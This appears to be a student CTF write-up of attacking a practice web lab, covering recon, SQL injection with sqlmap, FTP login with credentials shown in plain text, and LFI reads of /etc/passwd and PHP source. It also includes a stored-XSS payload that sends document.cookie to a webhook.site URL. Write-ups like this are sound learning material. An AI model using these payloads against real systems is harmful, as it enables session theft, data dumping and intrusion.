Hackwekend - Session 1 (Pentester web - Security Lab)

tags: ctf network exploits vulnerable top10owasp

Hi, I am back on series of CTF university LOL. Sorry be in late because i cost me 2 week to solve all flag of website. So let get it and try to learn some new

1. Recon Progressing:

• On this step, I will do some kind stuff for recon how to website work and it be on using what tech and port open, any way can be subdomain LOL
• Try with searching directory of website is using the dirsearch - once of best choice using to exploit directory - Try it with python download through this Link
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• Result of dirsearch is typically cool stuff can find it:
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  • So cool we find hidden directory is /.gitignore with 200 response - Good signal on recon so try to ctf.wheelife.net/.gititnore
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • Yup we find the flag 1 on hidden directory - coolstuff of challege

Flag1: Flag{ozIA3akOT7NcAwTa}

• So reach to second step on recon - using nmap to check what port is open

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  • So we know have twice port open on this website is 21 (Maybe helpful on next step) and yeah definelly have 80 port
  • Situation: Can we predict some situation why to port 21 is opening
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →

• So on next step we need to check what we have with technical of website, like programing language, framework, server, os, … blah blah?

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  • So it very easy config, website just have write by PHP and hosting open apache2 and ubuntu LOL
  • It spoil for us, how we can try to reach the deep of the website? Highly impact if we know all technical of website

Conclusion

• Have twice port open 21 and 80
• Wrote in PHP and Hosted on apache2 with ubuntuOS
• Get the 1 flag on hidden route

2. Exploit Progressing + GG everything for progressing

SQLi Exploit

• So look around we can see it have get_wards.php is really really strange it can have to SQLi http://ctf.wheelife.net/get_wards.php?district_id=1 so try with easy command to test it like ' OR 1=1– - so it locally have SQLi http://ctf.wheelife.net/get_wards.php?district_id=1%20OR%201=1--%20-
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• So we know 1 thing using sqlmap - powerful tool to scan SQL injection to dump all of database and get all table from that using command sqlmap -u ctf.wheelife.net/get_wards.php?district_id=1 --dump
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  • So with that command we get the config table really really helpful with second flag and FTP infomation login
  • Secondly we know password on login form but we need to know how hash of this - md4 or md5 - sha256 but onething i think it not helpful
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • It have some kind table like comment it have link to comment.php
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • And yup i have second flag and reach to ftp server to know what it has
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →

Flag 2: Flag{1NecwrX6WaeCHJmx}

FTP exploit

• So basically, All of pc have ftp service and you need to up forward that ==> so try command like ssh by: ftp ctf.wheelife.net
• Typing the username and password and go through with username:ftpuser - password:Ubuntu_2022_ftpuser
• So i login to that and so using more files/.flag (scanport and see port 21 is open)

Flag 3: Flag{AMFVGVLzhHBNXMAb}

XSS exploit

• So like i know and base on SQLmap return i have know the comment table is loading in somewhere so with hint it can use it to stealing cookie
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• So with that website we can look see it have 2 input is Name and Content but it just have reflectXSS but onething have some focus on IP and it is can be storedXSS and yup get the payload and return cookie with command on header X-Forward-For

<script>fetch('https://webhook.site/4a85e2af-96a5-454fbd93-fbc0065daa8d/' + document.cookie)</script>

• Result: flag=Flag{/xpeihQtrM+4HRBI}
• So we get the flag 4 and yup it really cool stuff if we got that

Flag 4: Flag{/xpeihQtrM+4HRBI}

LFI exploit

• So with cookie above, i can reach this endpoint is admin page with anything change the cookie like Burpsuite or Firefox reach to the end and we can get the suprising
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• So it have some route to move somewhere but focus on image we can see that load about somewhat is very strange and it can be have LFI on that
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• So try repeater tab with burpsuite i can see it load find content it webfolder and yet we can get the image and i know it have LFI
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• Try basic command like: file=../../../etc/passwd and yet we get what we want Poc of LFI exploit
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• So gg time, like i know the website which write with PHP and host in apache2 so somekind i get from this page can reach me to source code Solution to host LAMP web
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• So i have somekind idea about that like we can try some payload like

file=../../../var/www/wheelife/index.php - 500 ERR
file=../../../var/www/ctf/index.php - 200

• So yet we got the source reach to super strange route is /page.php
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• Command so importance: $ini = parse_ini_file('web.conf');. Give me idea have exist file web.conf so reach that and i find so really suprise
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• Some subdomain like api.wheelife.net is have flag.php but it just decoy
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  , so with that give me no have some secret in flag.php on file i can't see
• So reach that file=../../../var/www/api/flag.php and yup secret is spoiled
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

Flag 5: Flag{J3Gzrh18YP9kUig3}

Conclusion

The CTF is quitefun but some kind we wait to long to get result or just find that by guess somekind really ending point but it have reasonable comsumtion and not much time to upgrade level

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

. But happily to do that and give more change to upgrade to high level

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

. Hoping you get some kind is very cool stuff about this WU. Happy hacking !!!